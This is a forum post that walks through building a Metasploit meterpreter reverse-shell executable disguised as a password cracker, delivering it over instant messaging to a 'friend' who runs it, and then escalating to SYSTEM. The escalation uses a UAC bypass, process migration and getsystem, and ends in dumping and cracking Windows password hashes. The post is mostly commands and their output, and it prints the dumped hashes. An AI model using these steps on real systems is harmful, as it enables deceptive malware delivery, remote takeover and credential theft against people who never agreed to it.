Jump to content
crossbower

Pentesting with binary payload

Recommended Posts

Binary Payloads

It seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an executable from a Metasploit payload. This can be very useful in situations such as social engineering, if you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software.

Exemple with little joke :

My friend need a good passwd cracker.I created for him a best passwd cracker

How to create a binary payload : Binary Payloads - Metasploit Unleashed

We generate a Windows meterpreter executable that will connect back to us on port 443

msfpayload -p windows/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=443 X > /root/cracker.exe

Now the windows executable is created, we will use 'exploit/multi/handler' which is a stub that handles exploits launched outside of the framework.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.19
LHOST => 192.168.1.19
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) >exploit

And the listener started Waiting for a victim:

msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.19:443[*] Starting the payload handler...[*] Sending stage (474 bytes)[*] Command shell session 1 opened (192.168.1.91:443 -> 192.168.1.19:3250)

And I delivered for via IM for "my friend",..he executed the binary payload and the game started for hunting hashdump.

Metasploit has a Meterpreter script, 'getsystem', that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.

More info of privilege escalation here Privilege Escalation - Metasploit Unleashed

Befor we take a hashdump we need running with SYSTEM priveleges.

meterpreter > getuid
Server username: redmon-PC\redmon

This session I put in the background session 1 and I used meterpreter module bypassuac.

Reference : Bypass Windows 7 x86/x64 UAC Fully Patched - Meterpreter Module ?

Source : Windows Escalate UAC Protection Bypass

msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 1
msf exploit(bypassuac) > set PAYLOAD windows/meterpreter/revers_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set LHOST 192.168.1.19
LHOST => 192.168.1.19
msf exploit(bypassuac) > set LPORT 8989
LPORT => 8989
msf exploit(bypassuac) > exploit

[*] Started reverse handler on 192.168.1.19:5555 [*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...[*] Checking admin status...
[+] Part of Administrators group! Continuing...[*] Uploading the bypass UAC executable to the filesystem...[*] Meterpreter stager executable 73802 bytes long being uploaded..[*] Uploaded the agent to the filesystem....[*] Sending stage (769024 bytes) to 192.168.1.202
[*] Meterpreter session 2 opened (192.168.1.19:5555 -> 192.168.1.202:49171)

Now migrate one of the process wich running a SYSTEM privileges

Running ps command we seen a process we need for SYSTEM privs

1996 448 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM

Migrating a process SearchIndexer.exe

meterpreter > migrate 1996[*] Migrating from 3456 to 1996...[*] Migration completed successfully.

Now we running a 'getsystem' techniques to attempt to gain SYSTEM level privileges.

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

NOW THE SYSTEM READY FOR I TAKE A HASHDUMP

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee :b963c57010f218edc2cc3c229b5e4d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404 ee:f08f62a151d0b888dd5fe91187c3d968:::
redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed8 7bdb5fdc5e9cba88547376818d4:::

The hashes I cracked with john passwd cracker.The metasploit have a jtr modules for cracking

Sorry for mistakes I was tired and still working workplace

VIDEO TUT:

http://www.youtube.com/watch?v=j6dZIrO0890

Edited by crossbower
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...